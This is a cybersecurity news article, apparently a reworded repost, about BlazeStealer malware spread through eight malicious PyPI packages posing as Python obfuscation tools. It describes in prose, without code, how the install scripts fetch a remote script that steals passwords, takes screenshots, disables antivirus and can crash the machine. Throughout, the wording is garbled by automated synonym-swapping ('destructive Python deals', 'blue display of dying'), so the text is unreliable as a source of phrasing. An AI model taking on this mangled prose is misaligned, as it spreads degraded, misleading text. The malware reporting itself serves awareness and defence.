• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
beware, developers: blazestealer malware discovered in python packages on pypi

Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

You are here: Home / General Cyber Security News / Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI
November 8, 2023

A new set of destructive Python deals has slithered their way to the Python Package Index (PyPI) repository with the top aim of thieving sensitive information from compromised developer devices.

The offers masquerade as seemingly innocuous obfuscation applications, but harbor a piece of malware called BlazeStealer, Checkmarx explained in a report shared with The Hacker News.

“[BlazeStealer] retrieves an further destructive script from an exterior supply, enabling a Discord bot that gives attackers full handle above the victim’s pc,” security researcher Yehuda Gelb stated.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Cybersecurity

The marketing campaign, which commenced in January 2023, involves a whole of 8 packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the final of which was published in Oct.

These modules occur with set up.py and init.py information that are built to retrieve a Python script hosted on transfer[.]sh, which will get executed promptly on their set up.

Named BlazeStealer, the malware operates a Discord bot and permits the threat actor to harvest a vast assortment of details, including passwords from web browsers and screenshots, execute arbitrary commands, encrypt information, and deactivate Microsoft Defender Antivirus on the infected host.

Malicious Python packages

What is more, it can render the laptop unusable by ramping up CPU use, inserting a Windows Batch script in the startup listing to shut down the device, and even forcing a blue display of dying (BSoD) mistake.

“It stands to explanation that developers engaged in code obfuscation are possible dealing with useful and sensitive information and facts, and hence, to a hacker, this translates to a focus on well worth pursuing,” Gelb noted.

Cybersecurity

A the vast majority of downloads associated with the rogue deals originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were being collectively downloaded 2,438 occasions just before becoming taken down.

“The open-source domain stays a fertile floor for innovation, but it requires caution,” Gelb mentioned. “Builders ought to keep on being vigilant, and vet the packages prior to usage.”

Observed this article appealing? Stick to us on Twitter  and LinkedIn to study additional special content we write-up.


Some parts of this article are sourced from:
thehackernews.com

Previous Post: «guide: how vcisos, msps and mssps can keep their customers Guide: How vCISOs, MSPs and MSSPs Can Keep their Customers Safe from Gen AI Risks
Next Post: WhatsApp Introduces New Privacy Feature to Protect IP Address in Calls whatsapp introduces new privacy feature to protect ip address in»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • BREAKING: 7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. – Dutch Operation
  • OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities
  • Initial Access Brokers Target Brazil Execs via NF-e Spam and Legit RMM Trials
  • Deploying AI Agents? Learn to Secure Them Before Hackers Strike Your Business
  • Malicious npm Packages Infect 3,200+ Cursor Users With Backdoor, Steal Credentials
  • Beyond Vulnerability Management – Can You CVE What I CVE?
  • Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
  • Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
  • 38,000+ FreeDrain Subdomains Found Exploiting SEO to Steal Crypto Wallet Seed Phrases
  • SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root

Copyright © TheCyberSecurity.News, All Rights Reserved.